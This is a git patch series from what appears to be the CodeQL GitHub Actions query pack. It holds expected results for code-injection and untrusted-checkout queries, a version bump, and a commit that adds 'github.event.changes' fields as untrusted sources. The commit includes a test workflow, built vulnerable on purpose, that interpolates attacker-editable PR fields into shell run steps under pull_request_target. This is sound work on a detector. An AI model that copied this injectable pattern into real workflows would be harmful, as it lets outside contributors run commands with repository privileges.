Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | From e147a0bc710d449b0f05be16a2081beaca4744e9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:26:31 +0200 Subject: [PATCH 539/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a8a194c52ba6..ecde4c83b206 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.53 +version: 0.1.54 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e4cb89696496..cddb4f61bf65 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.53 +version: 0.1.54 groups: [actions, queries] suites: codeql-suites extractor: javascript From 16f1a53584a63b8c101a25b91fe5ac1eb09a0ec0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 18:21:54 +0200 Subject: [PATCH 540/707] Add new sources for github.event.changes --- ql/lib/ext/config/context_event_map.yml | 14 ++++++++++++++ .../ext/config/untrusted_event_properties.yml | 4 ++++ .../CWE-094/.github/workflows/test13.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 19 +++++++++++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 ++++++++++++++ 5 files changed, 65 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index e09dab14f2b8..4c2451b5ab85 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -4,34 +4,47 @@ extensions: extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] + - ["commit_comment", "github.event.changes"] - ["discussion", "github.event.discussion"] + - ["discussion", "github.event.changes"] - ["discussion_comment", "github.event.comment"] - ["discussion_comment", "github.event.discussion"] + - ["discussion_comment", "github.event.changes"] - ["issues", "github.event.issue"] + - ["issues", "github.event.changes"] - ["issue_comment", "github.event.issue"] - ["issue_comment", "github.event.comment"] + - ["issue_comment", "github.event.changes"] - ["gollum", "github.event.pages"] + - ["gollum", "github.event.changes"] - ["merge_group", "github.event.merge_group"] - ["pull_request", "github.event.pull_request"] - ["pull_request", "github.head_ref"] + - ["pull_request", "github.event.changes"] - ["pull_request_comment", "github.event.comment"] - ["pull_request_comment", "github.event.pull_request"] - ["pull_request_comment", "github.head_ref"] + - ["pull_request_comment", "github.event.changes"] - ["pull_request_review", "github.event.pull_request"] - ["pull_request_review", "github.event.review"] - ["pull_request_review", "github.head_ref"] + - ["pull_request_review", "github.event.changes"] - ["pull_request_review_comment", "github.event.comment"] - ["pull_request_review_comment", "github.event.pull_request"] - ["pull_request_review_comment", "github.event.review"] - ["pull_request_review_comment", "github.head_ref"] + - ["pull_request_review_comment", "github.event.changes"] - ["pull_request_target", "github.event.pull_request"] - ["pull_request_target", "github.head_ref"] + - ["pull_request_target", "github.event.changes"] - ["push", "github.event.commits"] - ["push", "github.event.head_commit"] + - ["push", "github.event.changes"] - ["repository_dispatch", "github.event.client_payload"] - ["workflow_dispatch", "github.event.inputs"] - ["workflow_run", "github.event.workflow"] - ["workflow_run", "github.event.workflow_run"] + - ["workflow_run", "github.event.changes"] # workflow_call receives the same event payload as the calling workflow - ["workflow_call", "github.event.client_payload"] - ["workflow_call", "github.event.comment"] @@ -46,4 +59,5 @@ extensions: - ["workflow_call", "github.event.review"] - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] + - ["workflow_call", "github.event.changes"] diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index 739544455da7..be2e1c9c7981 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -10,6 +10,7 @@ extensions: - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] - ["github\\.event\\.workflow_run\\.display_title", "title"] + - ["github\\.event\\.changes\\.title\\.from", "title"] # URL - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] # TEXT @@ -25,12 +26,14 @@ extensions: - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] - ["github\\.event\\.client_payload", "text"] + - ["github\\.event\\.changes\\.body\\.from", "title"] # BRANCH - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] - ["github\\.event\\.workflow_run\\.head_branch", "branch"] - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] - ["github\\.event\\.merge_group\\.head_ref", "branch"] + - ["github\\.event\\.changes\\.head\\.ref\\.from", "branch"] # LABEL - ["github\\.event\\.pull_request\\.head\\.label", "label"] # EMAIL @@ -79,5 +82,6 @@ extensions: - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] - ["github\\.event\\.workflow_run\\.head_repository", "json"] - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + - ["github\\.event\\.changes", "json"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml new file mode 100644 index 000000000000..1e5c7eec177d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test13.yml @@ -0,0 +1,14 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.changes.body.from }}" + - run: echo "${{ github.event.changes.title.from }}" + - run: echo "${{ github.event.changes.head.ref.from }}" + - run: echo "${{ toJson(github.event.changes) }}" + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 749d05244153..207fb3abf01b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -15,6 +15,7 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -89,8 +90,10 @@ edges | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | @@ -170,7 +173,9 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -329,11 +334,15 @@ nodes | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -403,6 +412,10 @@ nodes | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -444,6 +457,7 @@ subpaths | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | @@ -509,6 +523,7 @@ subpaths | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | 